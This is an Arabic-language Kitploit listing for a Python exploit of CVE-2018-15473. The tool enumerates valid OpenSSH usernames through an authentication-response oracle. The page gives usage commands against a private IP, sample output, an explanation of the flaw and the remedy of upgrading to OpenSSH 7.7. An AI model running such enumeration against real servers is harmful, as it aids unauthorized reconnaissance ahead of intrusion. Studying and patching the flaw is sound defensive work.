Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-15473 — استغلال قائم على Python لـ CVE-2018-15473 يمكن من تعداد أسماء مستخدمي OpenSSH عبر أوراكل استجابة المصادقة، مع أوضاع مستخدم واحد وقائمة كلمات. | Kitploit
أدوات/GitHubGitHub/0xrobiul/cve-2018-15473
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراق
GitHub0xrobiul/cve-2018-15473

CVE-2018-15473

استغلال قائم على Python لـ CVE-2018-15473 يمكن من تعداد أسماء مستخدمي OpenSSH عبر أوراكل استجابة المصادقة، مع أوضاع مستخدم واحد وقائمة كلمات.

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-15473

استغلال تعداد اسم المستخدم عبر SSH (OpenSSH 2.3 < 7.7)

نسخة معدلة من الاستغلال الأصلي: https://www.exploit-db.com/exploits/45233

  • تم التحويل إلى Python3

  • تمت إضافة خيار قائمة كلمات المستخدم

كيفية التشغيل

root@kitploit:~

#Install the requirements:

foo@bar:~$ pip3 install -r requirements.txt

root@kitploit:~

#For single username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -u root

[+] root is a valid username

root@kitploit:~

#For multiple username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt

[+] root is a valid username

[-] mysql is an invalid username

[-] mike is an invalid username

[-] foo is an invalid username

[-] bar is an invalid username

Valid Users: 

root

root@kitploit:~

#For more option:

foo@bar:~$ ./Exploit.py -h

حول الثغرة:

يستجيب النظام بشكل مختلف لمحاولات المصادقة الصالحة وغير الصالحة. يمكن لمستخدم عن بُعد إرسال طلبات مصممة خصيصًا لتحديد أسماء المستخدمين الصالحة على النظام المستهدف. وبالتالي، يمكن لمستخدم عن بُعد تحديد أسماء المستخدمين الصالحة على النظام المستهدف.

الحل:

يجب ترقية خادم OpenSSH إلى الإصدار 7.7 أو أعلى.

تنزيل الأداة